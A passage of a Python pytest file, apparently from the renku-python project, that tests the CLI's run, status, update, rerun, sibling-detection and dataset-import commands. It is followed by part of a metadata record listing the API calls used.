open('source.txt', 'w') as source:\n source.write('first,second,third,fourth')\n\n repo.git.add('--all')\n repo.index.commit('Changed source.txt')\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 1\n assert 'source.txt' in result.output\n\n\ndef test_streams_cleanup(project, runner, capsys):\n \"\"\"Test cleanup of standard streams.\"\"\"\n with open('source.txt', 'w') as source:\n source.write('first,second,third')\n\n # File outside the Git index should be deleted.\n with capsys.disabled():\n with open('result.txt', 'wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(\n args=('run', 'cat', 'source.txt'),\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 1}, 'The repo must be dirty.'\n finally:\n sys.stdout = old_stdout\n\n with open('source.txt', 'r') as source:\n assert source.read() == 'first,second,third'\n\n assert not Path('result.txt').exists()\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 1\n\n # File from the Git index should be restored.\n repo = git.Repo(project)\n with open('result.txt', 'w') as fp:\n fp.write('1')\n\n repo.index.add(['result.txt'])\n\n with capsys.disabled():\n with open('result.txt', 'wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(\n args=('run', 'cat', 'source.txt'),\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 1}, 'The repo must be dirty.'\n finally:\n sys.stdout = old_stdout\n\n with open('result.txt', 'r') as fp:\n assert fp.read() == '1'\n\n\ndef test_update(project, runner, capsys):\n \"\"\"Test automatic file update.\"\"\"\n cwd = Path(project)\n data = cwd / 'data'\n source = cwd / 'source.txt'\n output = data / 'result.txt'\n\n repo = git.Repo(project)\n\n def update_source(data):\n \"\"\"Update source.txt.\"\"\"\n with source.open('w') as fp:\n fp.write(data)\n\n repo.git.add('--all')\n repo.index.commit('Updated source.txt')\n\n update_source('1')\n\n with capsys.disabled():\n with open(source, 'rb') as stdin:\n with open(output, 'wb') as stdout:\n try:\n old_stdin, old_stdout = sys.stdin, sys.stdout\n sys.stdin, sys.stdout = stdin, stdout\n\n try:\n cli.cli.main(\n args=('run', 'wc', '-c'),\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdin, sys.stdout = old_stdin, old_stdout\n\n with output.open('r') as f:\n assert f.read().strip() == '1'\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 0\n\n update_source('12')\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 1\n\n assert _run_update(runner, capsys) == 0\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 0\n\n with output.open('r') as f:\n assert f.read().strip() == '2'\n\n # Source has been updated but output is unchanged.\n update_source('34')\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 1\n\n assert _run_update(runner, capsys) == 0\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 0\n\n with output.open('r') as f:\n assert f.read().strip() == '2'\n\n # Make sure the log contains the original parent.\n result = runner.invoke(cli.cli, ['log'])\n assert source.name in result.output\n\n\ndef test_streams_and_args_names(runner, capsys):\n \"\"\"Test streams and conflicting argument names.\"\"\"\n with capsys.disabled():\n with open('lalala', 'wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(args=('run', 'echo', 'lalala'), )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdout = old_stdout\n\n with open('lalala', 'r') as f:\n assert f.read().strip() == 'lalala'\n\n result = runner.invoke(cli.cli, ['status'], catch_exceptions=False)\n assert result.exit_code == 0\n\n\ndef test_datasets(data_file, data_repository, runner):\n \"\"\"Test importing data into a dataset.\"\"\"\n # create a dataset\n result = runner.invoke(cli.cli, ['dataset', 'create', 'dataset'])\n assert result.exit_code == 0\n assert os.stat('data/dataset/metadata.yml')\n\n # add data\n result = runner.invoke(\n cli.cli, ['dataset', 'add', 'dataset',\n str(data_file)]\n )\n assert result.exit_code == 0\n assert os.stat(\n os.path.join('data', 'dataset', os.path.basename(data_file))\n )\n\n # add data from a git repo via http\n result = runner.invoke(\n cli.cli, [\n 'dataset', 'add', 'dataset', '--target', 'README.rst',\n 'https://github.com/SwissDataScienceCenter/renku-python.git'\n ]\n )\n assert result.exit_code == 0\n assert os.stat('data/dataset/renku-python/README.rst')\n\n # add data from local git repo\n result = runner.invoke(\n cli.cli, [\n 'dataset', 'add', 'dataset', '-t', 'file', '-t', 'file2',\n os.path.dirname(data_repository.git_dir)\n ]\n )\n assert result.exit_code == 0\n\n\ndef test_multiple_file_to_dataset(tmpdir, data_repository, runner):\n \"\"\"Test importing multiple data into a dataset at once.\"\"\"\n # create a dataset\n result = runner.invoke(cli.cli, ['dataset', 'create', 'dataset'])\n assert result.exit_code == 0\n assert os.stat('data/dataset/metadata.yml')\n\n paths = []\n for i in range(3):\n new_file = tmpdir.join('file_{0}'.format(i))\n new_file.write(str(i))\n paths.append(str(new_file))\n\n # add data\n result = runner.invoke(cli.cli, ['dataset', 'add', 'dataset'] + paths)\n assert result.exit_code == 0\n\n\ndef test_relative_import_to_dataset(tmpdir, data_repository, runner):\n \"\"\"Test importing data from a directory structure.\"\"\"\n # create a dataset\n result = runner.invoke(cli.cli, ['dataset', 'create', 'dataset'])\n assert result.exit_code == 0\n assert os.stat('data/dataset/metadata.yml')\n\n zero_data = tmpdir.join('data.txt')\n zero_data.write('zero')\n\n first_level = tmpdir.mkdir('first')\n second_level = first_level.mkdir('second')\n\n first_data = first_level.join('data.txt')\n first_data.write('first')\n\n second_data = second_level.join('data.txt')\n second_data.write('second')\n\n paths = [str(zero_data), str(first_data), str(second_data)]\n\n # add data in subdirectory\n result = runner.invoke(\n cli.cli,\n ['dataset', 'add', 'dataset', '--relative-to',\n str(tmpdir)] + paths,\n catch_exceptions=False,\n )\n assert result.exit_code == 0\n\n assert os.stat(os.path.join('data', 'dataset', 'data.txt'))\n assert os.stat(os.path.join('data', 'dataset', 'first', 'data.txt'))\n assert os.stat(\n os.path.join('data', 'dataset', 'first', 'second', 'data.txt')\n )\n\n\ndef test_relative_git_import_to_dataset(tmpdir, project, runner):\n \"\"\"Test importing data from a directory structure.\"\"\"\n submodule_name = os.path.basename(tmpdir)\n\n # create a dataset\n result = runner.invoke(cli.cli, ['dataset', 'create', 'dataset'])\n assert result.exit_code == 0\n assert os.stat('data/dataset/metadata.yml')\n\n data_repo = git.Repo.init(tmpdir)\n\n zero_data = tmpdir.join('data.txt')\n zero_data.write('zero')\n\n first_level = tmpdir.mkdir('first')\n second_level = first_level.mkdir('second')\n\n first_data = first_level.join('data.txt')\n first_data.write('first')\n\n second_data = second_level.join('data.txt')\n second_data.write('second')\n\n paths = [str(zero_data), str(first_data), str(second_data)]\n data_repo.index.add(paths)\n data_repo.index.commit('Added source files')\n\n # add data in subdirectory\n result = runner.invoke(\n cli.cli,\n [\n 'dataset', 'add', 'dataset', '--relative-to',\n str(first_level),\n str(tmpdir)\n ],\n catch_exceptions=False,\n )\n assert result.exit_code == 0\n\n assert os.stat(os.path.join('data', 'dataset', submodule_name, 'data.txt'))\n assert os.stat(\n os.path.join('data', 'dataset', submodule_name, 'second', 'data.txt')\n )\n\n # add data in subdirectory\n result = runner.invoke(\n cli.cli,\n ['dataset', 'add', 'relative', '--relative-to', 'first',\n str(tmpdir)],\n catch_exceptions=False,\n )\n assert result.exit_code == 0\n\n assert os.stat(\n os.path.join('data', 'relative', submodule_name, 'data.txt')\n )\n assert os.stat(\n os.path.join('data', 'relative', submodule_name, 'second', 'data.txt')\n )\n\n\ndef test_file_tracking(base_runner):\n \"\"\"Test .gitattribute handling on renku run.\"\"\"\n runner = base_runner\n\n os.mkdir('test-project')\n os.chdir('test-project')\n result = runner.invoke(cli.cli, ['init'])\n assert result.exit_code == 0\n\n result = runner.invoke(cli.cli, ['run', 'touch', 'output'])\n assert result.exit_code == 0\n\n with open('.gitattributes') as f:\n gitattributes = f.read()\n assert 'output' in gitattributes\n\n\ndef test_status_with_submodules(base_runner):\n \"\"\"Test status calculation with submodules.\"\"\"\n os.mkdir('foo')\n os.mkdir('bar')\n\n with open('woop', 'w') as f:\n f.write('woop')\n\n os.chdir('foo')\n result = base_runner.invoke(\n cli.cli, ['init', '-S'], catch_exceptions=False\n )\n assert result.exit_code == 0\n\n os.chdir('../bar')\n result = base_runner.invoke(\n cli.cli, ['init', '-S'], catch_exceptions=False\n )\n assert result.exit_code == 0\n\n os.chdir('../foo')\n result = base_runner.invoke(\n cli.cli, ['dataset', 'add', 'f', '../woop'], catch_exceptions=False\n )\n assert result.exit_code == 0\n\n os.chdir('../bar')\n result = base_runner.invoke(\n cli.cli, ['dataset', 'add', 'b', '../foo/data/f/woop'],\n catch_exceptions=False\n )\n assert result.exit_code == 0\n\n # Produce a derived data from the imported data.\n with open('woop.wc', 'w') as stdout:\n with contextlib.redirect_stdout(stdout):\n try:\n cli.cli.main(\n args=('run', 'wc', 'data/b/foo/data/f/woop'),\n prog_name=base_runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n\n result = base_runner.invoke(cli.cli, ['status'], catch_exceptions=False)\n assert result.exit_code == 0\n\n # Modify the source data.\n os.chdir('../foo')\n with open('data/f/woop', 'w') as f:\n f.write('woop2')\n\n call(['git', 'commit', '-am', 'commiting changes to woop'])\n\n os.chdir('../bar')\n call(['git', 'submodule', 'update', '--rebase', '--remote'])\n call(['git', 'commit', '-am', 'update submodule'])\n\n result = base_runner.invoke(cli.cli, ['status'], catch_exceptions=False)\n assert result.exit_code != 0\n\n\ndef test_unchanged_output(runner):\n \"\"\"Test detection of unchanged output.\"\"\"\n cmd = ['run', 'touch', '1']\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n\n cmd = ['run', 'touch', '1']\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 1\n\n\ndef test_unchanged_stdout(runner, capsys):\n \"\"\"Test detection of unchanged stdout.\"\"\"\n with capsys.disabled():\n with open('output.txt', 'wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(args=('run', 'echo', '1'), )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdout = old_stdout\n\n with capsys.disabled():\n with open('output.txt', 'wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(args=('run', 'echo', '1'), )\n except SystemExit as e:\n # The stdout has not been modified!\n assert e.code in {None, 1}\n finally:\n sys.stdout = old_stdout\n\n\ndef test_modified_output(project, runner, capsys):\n \"\"\"Test detection of changed file as output.\"\"\"\n cwd = Path(project)\n source = cwd / 'source.txt'\n output = cwd / 'result.txt'\n\n repo = git.Repo(project)\n cmd = ['run', 'cp', '-r', str(source), str(output)]\n\n def update_source(data):\n \"\"\"Update source.txt.\"\"\"\n with source.open('w') as fp:\n fp.write(data)\n\n repo.git.add('--all')\n repo.index.commit('Updated source.txt')\n\n update_source('1')\n\n # The output file does not exist.\n assert not output.exists()\n\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n\n # The output file is copied from the source.\n with output.open('r') as f:\n assert f.read().strip() == '1'\n\n update_source('2')\n\n # The input file has been updated and output is recreated.\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n\n with output.open('r') as f:\n assert f.read().strip() == '2'\n\n update_source('3')\n\n # The input has been modifed and we check that the previous\n # run command correctly recognized output.txt.\n assert _run_update(runner, capsys) == 0\n\n with output.open('r') as f:\n assert f.read().strip() == '3'\n\n\ndef test_siblings(runner):\n \"\"\"Test detection of siblings.\"\"\"\n siblings = {'brother', 'sister'}\n\n cmd = ['run', 'touch'] + list(siblings)\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n\n for sibling in siblings:\n cmd = ['show', 'siblings', sibling]\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n\n output = {\n name.strip()\n for name in result.output.split('\\n') if name.strip()\n }\n assert output == siblings, 'Checked {0}'.format(sibling)\n\n\ndef test_orphan(project, runner):\n \"\"\"Test detection of an orphan.\"\"\"\n cwd = Path(project)\n orphan = cwd / 'orphan.txt'\n\n cmd = ['run', 'touch', orphan.name]\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n\n cmd = ['show', 'siblings', 'orphan.txt']\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n assert 'orphan.txt\\n' == result.output\n\n\ndef test_only_child(runner):\n \"\"\"Test detection of an only child.\"\"\"\n cmd = ['run', 'touch', 'only_child']\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n\n cmd = ['show', 'siblings', 'only_child']\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n assert 'only_child\\n' == result.output\n\n\ndef test_siblings_update(project, runner, capsys):\n \"\"\"Test detection of siblings during update.\"\"\"\n cwd = Path(project)\n parent = cwd / 'parent.txt'\n brother = cwd / 'brother.txt'\n sister = cwd / 'sister.txt'\n siblings = {brother, sister}\n\n repo = git.Repo(project)\n\n def update_source(data):\n \"\"\"Update parent.txt.\"\"\"\n with parent.open('w') as fp:\n fp.write(data)\n\n repo.git.add('--all')\n repo.index.commit('Updated parent.txt')\n\n update_source('1')\n\n # The output files do not exist.\n assert not any(sibling.exists() for sibling in siblings)\n\n cmd = ['run', 'tee', 'brother.txt']\n\n with capsys.disabled():\n with parent.open('rb') as stdin:\n with sister.open('wb') as stdout:\n try:\n old_stdin, old_stdout = sys.stdin, sys.stdout\n sys.stdin, sys.stdout = stdin, stdout\n try:\n cli.cli.main(\n args=cmd,\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdin, sys.stdout = old_stdin, old_stdout\n\n # The output file is copied from the source.\n for sibling in siblings:\n with sibling.open('r') as f:\n assert f.read().strip() == '1', sibling\n\n update_source('2')\n\n # Siblings must be updated together.\n for sibling in siblings:\n assert 1 == _run_update(runner, capsys, args=('update', sibling.name))\n\n # Update brother and check the sister has not been changed.\n assert 0 == _run_update(\n runner, capsys, args=('update', '--with-siblings', brother.name)\n )\n\n for sibling in siblings:\n with sibling.open('r') as f:\n assert f.read().strip() == '2', sibling\n\n update_source('3')\n\n # Siblings kept together even when one is removed.\n repo.index.remove([brother.name], working_tree=True)\n repo.index.commit('Brother removed')\n\n assert not brother.exists()\n\n # Update should find also missing siblings.\n assert 1 == _run_update(runner, capsys, args=('update', ))\n assert 0 == _run_update(runner, capsys, args=('update', '--with-siblings'))\n\n for sibling in siblings:\n with sibling.open('r') as f:\n assert f.read().strip() == '3', sibling\n\n\ndef test_simple_rerun(project, runner, capsys):\n \"\"\"Test simple file recreation.\"\"\"\n greetings = {'hello', 'hola', 'ahoj'}\n\n cwd = Path(project)\n source = cwd / 'source.txt'\n selected = cwd / 'selected.txt'\n\n repo = git.Repo(project)\n\n with source.open('w') as f:\n f.write('\\n'.join(greetings))\n\n repo.git.add('--all')\n repo.index.commit('Created greetings')\n\n cmd = [\n 'run', 'python', '-S', '-c',\n 'import sys, random; print(random.choice(sys.stdin.readlines()))'\n ]\n\n with capsys.disabled():\n with source.open('rb') as stdin:\n with selected.open('wb') as stdout:\n try:\n old_stdin, old_stdout = sys.stdin, sys.stdout\n sys.stdin, sys.stdout = stdin, stdout\n try:\n cli.cli.main(\n args=cmd,\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdin, sys.stdout = old_stdin, old_stdout\n\n with selected.open('r') as f:\n greeting = f.read().strip()\n assert greeting in greetings\n\n def _rerun():\n \"\"\"Return greeting after reruning.\"\"\"\n assert 0 == _run_update(runner, capsys, args=('rerun', str(selected)))\n with selected.open('r') as f:\n greeting = f.read().strip()\n assert greeting in greetings\n return greeting\n\n for _ in range(100):\n new_greeting = _rerun()\n if greeting != new_greeting:\n break\n\n assert greeting != new_greeting, \"Something is not random\"\n\n for _ in range(100):\n new_greeting = _rerun()\n if greeting == new_greeting:\n break\n\n assert greeting == new_greeting, \"Something is not random\"\n\n\ndef test_rerun_with_inputs(project, runner, capsys):\n \"\"\"Test file recreation with specified inputs.\"\"\"\n cwd = Path(project)\n first = cwd / 'first.txt'\n second = cwd / 'second.txt'\n inputs = (first, second)\n\n output = cwd / 'output.txt'\n\n cmd = [\n 'run', 'python', '-S', '-c', 'import random; print(random.random())'\n ]\n\n def _generate(output, cmd):\n \"\"\"Generate an output.\"\"\"\n with capsys.disabled():\n with output.open('wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(\n args=cmd,\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdout = old_stdout\n\n for file_ in inputs:\n _generate(file_, cmd)\n\n cmd = ['run', 'cat'] + [str(path) for path in inputs]\n _generate(output, cmd)\n\n with output.open('r') as f:\n initial_data = f.read()\n\n assert 0 == _run_update(runner, capsys, args=('rerun', str(output)))\n\n with output.open('r') as f:\n assert f.read() != initial_data, \"The output should have changed.\"\n\n # Keep the first file unchanged.\n with first.open('r') as f:\n first_data = f.read()\n\n assert 0 == _run_update(\n runner, capsys, args=('rerun', '--from', str(first), str(output))\n )\n\n with output.open('r') as f:\n assert f.read().startswith(first_data)\n", "repo_name": "leafty/renku-python", "sub_path": "tests/test_cli.py", "file_name": "test_cli.py", "file_ext": "py", "file_size_in_byte": 27588, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "86", "api": [{"api_name": "renku.cli.cli.main", "line_number": 22, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 22, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 22, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 24, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 24, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 34, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 34, "usage_type": "name"}, {"api_name": "renku.__version__", "line_number": 35, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 41, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 41, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 38, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 38, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 48, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 48, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 59, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 59, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 63, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 64, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 64, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 70, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 71, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 71, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 78, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 78, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 84, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 85, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 86, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 87, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 88, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 88, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 93, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 93, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 102, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 102, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 105, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 105, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 109, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 109, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 112, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 112, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 119, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 119, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 125, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 125, "usage_type": "name"}, {"api_name": "contextlib.redirect_stdout", "line_number": 129, "usage_type": "call"}, {"api_name": "renku.cli.cli.main", "line_number": 131, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 131, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 131, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 133, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 133, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 139, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 139, "usage_type": "name"}, {"api_name": "renku.models.cwl.workflow.Workflow.from_cwl", "line_number": 144, "usage_type": "call"}, {"api_name": "renku.models.cwl.workflow.Workflow", "line_number": 144, "usage_type": "name"}, {"api_name": "yaml.load", "line_number": 144, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 148, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 148, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 149, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 149, "usage_type": "name"}, {"api_name": "git.Repo", "line_number": 158, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 170, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 170, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 171, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 171, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 173, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 173, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 173, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 175, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 175, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 180, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 185, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 185, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 188, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 188, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 197, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 197, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 211, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 212, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 214, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 214, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 214, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 216, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 216, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 221, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 226, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 228, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 228, "usage_type": "name"}, {"api_name": "git.Repo", "line_number": 232, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 241, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 242, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 244, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 244, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 244, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 246, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 246, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 251, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 259, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 264, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 280, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 280, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 281, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 281, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 284, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 284, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 284, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 286, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 286, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 291, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 291, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 296, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 296, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 301, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 301, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 306, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 306, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 315, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 315, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 320, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 320, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 327, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 327, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 336, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 337, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 339, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 339, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 339, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 343, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 348, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 348, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 355, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 355, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 357, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 361, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 361, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 365, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 366, "usage_type": "call"}, {"api_name": "os.path", "line_number": 366, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 366, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 371, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 371, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 377, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 381, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 381, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 383, "usage_type": "call"}, {"api_name": "os.path", "line_number": 383, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 392, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 392, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 394, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 403, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 403, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 410, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 410, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 412, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 430, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 430, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path", "line_number": 437, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 438, "usage_type": "call"}, {"api_name": 